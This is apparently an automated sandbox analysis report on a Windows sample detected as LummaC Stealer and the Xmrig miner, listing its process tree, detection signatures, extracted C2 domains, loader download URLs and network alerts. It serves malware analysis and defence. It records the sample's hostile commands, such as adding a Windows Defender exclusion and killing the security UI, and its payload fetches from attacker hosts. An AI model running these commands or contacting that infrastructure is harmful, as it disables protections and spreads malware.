Windows Analysis Report
New-inst-x64.exe

Overview

General Information

Sample name: New-inst-x64.exe
Analysis ID: 1637051
MD5: d91b1e9db00162b86d2d3c14e1a943ce
SHA1: e487b841d7c5f6eb48d0cdd3d36b340636591abe
SHA256: b1938f21d058442903d3d4c4a2aed153d59300cffd933e213acbb9b5e7d7a4be
Tags: exe, user-tmechen_
Infos:

Detection

LummaC Stealer, Xmrig
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject code into remote processes
Loading BitLocker PowerShell Module
PE file contains section with special chars
PE file has nameless sections
Queries memory information (via WMI often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses known network protocols on non-standard ports
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

  • System is w10x64
  • New-inst-x64.exe (PID: 7780 cmdline: "C:\Users\user\Desktop\New-inst-x64.exe" MD5: D91B1E9DB00162B86D2D3C14E1A943CE)
    • cmd.exe (PID: 7984 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 8028 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 8068 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8116 cmdline: powershell -Command "Get-WmiObject Win32_PortConnector" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 7236 cmdline: C:\Windows\system32\cmd.exe /d /s /c "net session" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7396 cmdline: net session MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7440 cmdline: C:\Windows\system32\net1 session MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 7496 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 7528 cmdline: taskkill /F /IM SecHealthUI.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
    • cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5736 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 5344 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7568 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • vbczvzznbmunxtn.exe (PID: 4348 cmdline: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 2324 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 3028 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 4380 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 7628 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 2964 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 3580 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 2492 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 2172 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 2576 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 5704 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 7616 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 5736 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 7612 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 7600 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 352 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 5348 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 4344 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 1292 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 8088 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 5828 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 8100 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 4796 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 2224 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 5580 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 3840 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
  • svchost.exe (PID: 7876 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2612 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7472 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 8008 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 8176 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8072 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": ["menuedgarli.shop/AUIqn", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "9eddd878e03715edd627f50c1f29ec6d309b2d28521a9b9872d266ca"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
dump.pcap | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown | 0xb7d537:$a1: mining.set_target; 0xb77501:$a2: XMRIG_HOSTNAME; 0xb79af1:$a3: Usage: xmrig [OPTIONS]; 0xb774d9:$a4: XMRIG_VERSION

Source | Rule | Description | Author | Strings
0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

      System Summary

      Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\New-inst-x64.exe", ParentImage: C:\Users\user\Desktop\New-inst-x64.exe, ParentProcessId: 7780, ParentProcessName: New-inst-x64.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", ProcessId: 7564, ProcessName: cmd.exe
      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Get-WmiObject Win32_PortConnector", CommandLine: powershell -Command "Get-WmiObject Win32_PortConnector", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Get-WmiObject Win32_PortConnector", ProcessId: 8116, ProcessName: powershell.exe
      Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7876, ProcessName: svchost.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2025-03-13T10:32:19.286273+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49727 | 147.45.124.241 | 80 | TCP
      2025-03-13T10:32:23.322794+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49727 | 147.45.124.241 | 80 | TCP
      2025-03-13T10:32:19.286273+0100 | 2829056 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.4 | 49727 | 147.45.124.241 | 80 | TCP
      2025-03-13T10:32:40.812853+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.236.26.111 | 5968 | 192.168.2.4 | 49730 | TCP

      AV Detection

      Source: http://138.124.55.36/loader/1/file3.exe, Avira URL Cloud: Label: malware
      Source: menuedgarli.shop/AUIqn, Avira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Local\Temp\xctyuuxnvcrcuez.exe, Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe, Avira: detection malicious, Label: TR/Crypt.Agent.ivuts
      Source: C:\Users\user\AppData\Local\mbtbiqwunmmmyby.exe, Avira: detection malicious, Label: TR/Spy.ClipBanker.bwbhz
      Source: 0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: LummaC {"C2 url": ["menuedgarli.shop/AUIqn", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "9eddd878e03715edd627f50c1f29ec6d309b2d28521a9b9872d266ca"}
      Source: C:\Users\user\AppData\Local\mbtbiqwunmmmyby.exe, ReversingLabs: Detection: 45%
      Source: C:\Users\user\AppData\Local\ztrucvcctzwerxc.exe, ReversingLabs: Detection: 25%

      Bitcoin Miner

      Source: Yara match, File source: dump.pcap, type: PCAP
      Source: New-inst-x64.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: New-inst-x64.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\Users\szska\.nexe\16.20.2\out\Release\node.pdb source: New-inst-x64.exe, 00000000.00000000.1171874817.000000000306D000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: !"#$% !"#$%&'()*+,-./0123456789:;<=>?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzdes(long)compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASMbuilt on: Sun Aug 6 12:30:37 2023 UTCplatform: OPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "NUL"QUICnot available@@@@@@@@@hHHHH@@@@@@@@@@@@@@@@@@( source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe, Code function: 28_2_0046FCDE FindFirstFileExW,28_2_0046FCDE
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe, Code function: 28_2_0046FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_0046FD8F
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe, Code function: 29_2_0046FCDE FindFirstFileExW,29_2_0046FCDE
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe, Code function: 29_2_0046FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_0046FD8F

      Networking

      Source: Network traffic, Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.236.26.111:5968 -> 192.168.2.4:49730
      Source: unknown, Network traffic detected: HTTP traffic on port 49720 -> 3000
      Source: unknown, Network traffic detected: HTTP traffic on port 49721 -> 3000
      Source: unknown, Network traffic detected: HTTP traffic on port 3000 -> 49721
      Source: global traffic, TCP traffic: 192.168.2.4:49720 -> 185.170.153.104:3000
      Source: global traffic, TCP traffic: 192.168.2.4:49721 -> 5.252.153.122:3000
      Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK; Date: Thu, 13 Mar 2025 09:31:46 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Wed, 12 Mar 2025 11:54:14 GMT; ETag: "14c200-63023dd3da07b"; Accept-Ranges: bytes; Content-Length: 1360384; Connection: close; Content-Type: application/x-msdos-program
      Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK; Date: Thu, 13 Mar 2025 09:31:52 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Thu, 06 Mar 2025 13:30:23 GMT; ETag: "3daa00-62fac821ad56f"; Accept-Ranges: bytes; Content-Length: 4041216; Connection: close; Content-Type: application/x-msdos-program
      Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK; Date: Thu, 13 Mar 2025 09:31:59 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Wed, 12 Mar 2025 17:35:05 GMT; ETag: "15600-63028a03aa5c5"; Accept-Ranges: bytes; Content-Length: 87552; Connection: close; Content-Type: application/x-msdos-program
      Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK; Date: Thu, 13 Mar 2025 09:32:03 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Wed, 12 Mar 2025 17:35:06 GMT; ETag: "6b200-63028a047c524"; Accept-Ranges: bytes; Content-Length: 438784; Connection: close; Content-Type: application/x-msdos-program
      Source: global traffic HTTP traffic detected: GET /api/or4yk1zqaf HTTP/1.1 Host: 185.170.153.104:3000 Connection: close
      Source: global traffic HTTP traffic detected: GET /api/or4yk1zqaf HTTP/1.1 Host: 5.252.153.122:3000 Connection: close
      Source: global traffic HTTP traffic detected: GET /loader/29/file.exe HTTP/1.1 Host: 138.124.55.36 Connection: close
      Source: global traffic HTTP traffic detected: GET /loader/1/file1.exe HTTP/1.1 Host: 138.124.55.36 Connection: close
      Source: global traffic HTTP traffic detected: GET /loader/1/file2.exe HTTP/1.1 Host: 138.124.55.36 Connection: close
      Source: global traffic HTTP traffic detected: GET /loader/1/file3.exe HTTP/1.1 Host: 138.124.55.36 Connection: close
      Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49727 -> 147.45.124.241:80
      Source: Network traffic Suricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.4:49727 -> 147.45.124.241:80
      Source: unknown TCP traffic detected without corresponding DNS query: 185.170.153.104
      Source: unknown TCP traffic detected without corresponding DNS query: 5.252.153.122
      Source: unknown TCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://narwhaljs.org)
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://userguide.icu-project.org/strings/properties
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.000000000266D000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.unicode.org/copyright.html
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10704
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://console.spec.whatwg.org/#clear
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://console.spec.whatwg.org/#console-namespace
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://console.spec.whatwg.org/#count
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://console.spec.whatwg.org/#count-map
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://console.spec.whatwg.org/#countreset
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://console.spec.whatwg.org/#table
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://crbug.com/v8/7848
